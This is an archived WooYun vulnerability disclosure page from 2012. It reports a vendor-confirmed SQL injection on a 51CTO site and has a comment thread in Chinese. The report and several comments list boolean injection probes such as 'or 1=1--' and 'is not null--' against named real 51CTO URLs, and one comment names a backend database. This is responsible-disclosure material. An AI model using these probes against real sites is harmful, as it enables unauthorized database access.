当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09908

漏洞标题:51CTO猪肉点

相关厂商:51CTO技术网站

漏洞作者: _Evil

提交时间:2012-07-19 20:44

修复时间:2012-09-02 20:44

公开时间:2012-09-02 20:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-19: 细节已通知厂商并且等待厂商处理中
2012-07-20: 厂商已经确认,细节仅向厂商公开
2012-07-30: 细节向核心白帽子及相关领域专家公开
2012-08-09: 细节向普通白帽子公开
2012-08-19: 细节向实习白帽子公开
2012-09-02: 细节向公众公开

简要描述:

is not null-- is null--
or 1=1-- or 1=2--

详细说明:

http://www.51cto.com/php/artcomment.php?artid=325577
is not null-- is null--
or 1=1-- or 1=2--

漏洞证明:



WooYun: 51CTO某盲注+xss

修复方案:

过滤

版权声明:转载请注明来源 _Evil@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-07-20 10:22

厂商回复:

感谢提供,马上处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-19 20:52 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    http://xxxxx.51cto.com/index.php?category=3%20or%201=2--http://xxxxx.51cto.com/index.php?category=3%20or%201=1--是这里

  2. 2012-07-19 20:56 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    1、测漏 2、猪肉

  3. 2012-07-19 21:05 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    我的沙发。。。

  4. 2012-07-19 21:14 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    哇 有waf ~

  5. 2012-07-19 21:15 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @livers 小心抓你

  6. 2012-07-20 09:06 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @_Evil 51cto是不是那个下载需要 注册还有什么币的?

  7. 2012-07-20 09:42 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    51cto的站,曾经暴最高权限注入,其管理员不让提交到wooyun。出于好心直接报给管理员了,2012年以前,防护基本为0一科普类型的网站,没什么价值。

  8. 2012-07-20 18:12 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @ Jesus = = 2012之前我没去book.51cto.com看过

  9. 2012-07-20 20:23 | b4dboy ( 实习白帽子 | Rank:52 漏洞数:3 | good bye)

    @_Evil 猪肉很贵,吃不起

  10. 2012-07-27 16:53 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    @_Evil http://selftest.51cto.com/index.php?category=7 DB:n_selftest晴天小鬼,你发的不是不这个?稍候我也发一个!

  11. 2012-07-27 20:49 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @ Jesus 不是www.5cto.com的

  12. 2012-07-27 20:49 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @ Jesus www.5cto.com主站的